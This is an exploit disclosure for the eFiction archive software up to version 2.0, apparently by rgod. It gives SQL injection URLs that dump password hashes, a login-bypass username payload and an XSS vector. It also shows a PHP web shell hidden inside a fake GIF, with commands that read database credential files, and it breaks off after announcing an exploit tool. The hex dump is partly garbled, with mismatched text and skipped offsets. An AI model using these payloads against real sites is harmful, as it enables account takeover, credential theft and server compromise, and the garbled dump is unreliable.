efiction <= 2.0 remote code execution / SQL injection / login bypass / cross site scripting / path & information disclosure software: site: http://www.efiction.wallflowergirl.com/index.php description: "Efiction is a software program that enables users to run automated original or fanfiction archives on their websites. The program is PHP and MySQL database driven and is released as open-source software." i) xss: efiction 1.0/1.1: http://[target]/efiction/titles.php?action=viewlist&let= on version 2.0, thorugh sql injection: http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* ii) if magic_quotes_gpc off -> SQL INJECTION: you can see at screen any admin/user MD5 password hash efiction 1.0: http://[target]/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/* http://[target]/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/* http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* efiction 1.1: http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/* http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/* efiction 2.0 http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* iii) if magic_quotes_gpc off -> Login bypass: you can login as admin typing: efiction 1.0: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/* password: [nothing] efiction 1.1: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/* password: [nothing] efiction 2.0: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/* password: [nothing] ^ | | this is the hash of [nothing] iv) remote code execution (1.0/1.1/2.0): register, a temporary password will be sent to you by email, login, goto "Manage Images" (or go to http://target/path/user.php?action=manageimages&upload=upload), choose "Upload new image", upload a fake gif cmd.php like this (this is the hexadecimal dump): 00000000:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4 GIF89a...... 00000010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4 .....w..k.L... 00000020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00 .iw...nb....g.. 00000030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00 .4.u.....a..... 00000040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00 ............... 00000050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00 ....... ....... 00000060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00 .o...........V.. 00000070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72 ...8............ 000000d0:01 00 cc 00 00 15 00 00 00 58 00 10 e6 00 04 12 ........X..... 000000e0:00 10 00 00 04 05 00 01 90 00 00 f6 00 00 77 00 ............w. 000000f0:00 c8 00 10 d5 00 e8 f5 00 12 77 00 00 ff 00 13 ......w.... 00000100:ff 00 6c ff 00 6c ff 00 74 6a 00 03 16 00 00 f4 .l.l.tj..... 00000110:00 00 77 00 00 c4 00 30 1e 00 75 e5 00 15 77 00 ..w...0..u..w. 00000120:00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 dc ............... 00000130:00 00 e7 00 00 12 00 00 00 70 00 01 59 00 00 18 ........p..Y... 00000140:00 00 00 00 00 04 00 88 01 00 e8 05 00 12 01 00 .............. 00000150:00 6c 00 04 e3 00 42 12 00 6e 00 00 74 7e 00 30 .l...B..n..t~.0 00000160:00 00 87 00 00 6e c0 00 74 00 00 ff 00 00 ff 00 ....n.t..... 00000170:00 ff 00 00 ff ff 00 d6 ff 00 32 ff 00 6e ff 00 .....2.n. 00000180:74 ff 00 6c ff 00 5b ff 00 e5 ff 00 77 00 00 53 t.l.[..w..S 00000190:00 00 15 00 00 53 00 00 00 00 00 00 00 00 00 00 .....S.......... 000001a0:00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 ................ 000001b0:00 6b 00 00 00 00 00 00 00 00 00 00 00 58 00 00 .k...........X.. 000001c0:03 00 f0 00 00 15 00 00 00 06 00 00 f6 00 00 e4 ............. 000001d0:00 00 77 00 00 0f 00 00 1e 00 00 e5 00 00 77 00 ..w..........w. 000001e0:00 00 00 00 01 00 00 00 00 00 00 00 00 f8 74 00 .............t. 000001f0:62 e7 00 01 12 00 00 00 00 00 c8 68 00 28 32 15 b........h.(2. 00000200:e5 e6 00 77 77 a4 00 ff e5 00 ff 12 00 ff 00 00 .ww...... 00000210:ff 00 00 6c 00 00 5b 00 00 e5 00 00 77 fc f8 36 ..l..[....w6 00000220:f7 62 00 12 15 00 00 00 00 05 00 36 90 01 00 f6 b.........6.. 00000230:00 00 77 00 00 c8 04 d8 d5 29 ed f5 e5 12 77 77 ..w...).ww 00000240:00 ff 94 ff ff e7 ff ff 12 ff ff 00 ff 6a 64 00 ...jd. 00000250:16 2f 00 f4 e6 00 77 77 00 e0 00 9c 18 00 e8 e5 ./..ww.... 00000260:00 12 77 00 00 00 ff 4e 00 ff 21 15 ff 4c 00 ff ..w...N.!.L. 00000270:00 00 6f 7c 00 10 e8 00 e5 12 00 77 00 f8 00 7b ..o|.....w..{ 00000280:62 00 e0 15 00 4e 00 00 00 00 98 b0 01 e8 e8 00 b...N...... 00000290:12 12 00 00 00 64 98 6f 2f 10 10 e6 e5 e5 77 77 .....do/..ww 000002a0:77 00 10 52 00 e4 e9 00 4e 12 00 00 00 61 20 c8 w..R..N....a 000002b0:00 02 ff 6c 4f ff 00 00 7f 69 00 1c 00 01 e9 61 ..lO..i....a 000002c0:00 12 00 00 00 29 94 00 00 e7 00 00 12 00 00 00 .....)........ 000002d0:00 00 00 6f 00 01 10 00 00 e5 00 00 77 00 a0 00 ...o.......w. . 000002e0:00 3a 00 00 50 00 00 00 00 00 00 01 00 30 00 00 .:..P........0.. 000002f0:00 00 00 69 00 00 61 60 00 74 f1 00 74 15 00 69 ...i..a`.t.t..i 00000300:00 00 00 f0 00 00 aa 00 02 47 00 00 00 21 f9 04 .......G...!. 00000310:00 00 00 00 00 2c 00 00 00 00 01 00 01 00 07 08 .....,.......... 00000320:04 00 01 04 04 00 3b ......; you can craft a smaller gif, try it the uploaded file is reachable at: http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php (efiction 1.0/1.1) or http://[target]/[path_to_efiction]/stories/[user_id]/images/cmd.php ex: http://[target]/[path_to_efiction]/stories/1/images/cmd.php http://[target]/[path_to_efiction]/stories/2/images/cmd.php (efiction 2.0) now you can launch commands redirecting the output to a temporary file: http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=ls%20-la>README http://[target]/[path_to_efiction]/stories/[your_username]/images/README to see database username & password: http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../data/dbconfig.php>README http://[target]/[path_to_efiction]/stories/[your_username]/images/README to see database table prefix and various settings: http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../config.php>README http://[target]/[path_to_efiction]/stories/[your_username]/images/README notes: in efiction 1.0 /1.1 members are NOT allowed to upload images by default if efiction 2.0 members are allowed to upload images by default from efiction 1.1, installing the script, you can specify a different table prefix, try efiction_fanfiction_authors, etc. v) path disclosure: http://[target]/efiction/storyblock.php vi) information disclosure: mphhh... http://[target]/[path]/phpinfo.php vii) you can always check for a install.php or upgrade.php to perform some actions on site/database this is the exploit tool for iv) :
********* eFiction <= 2.0 remote commands xctn **********
a script by rgod at http://rgod.altervista.org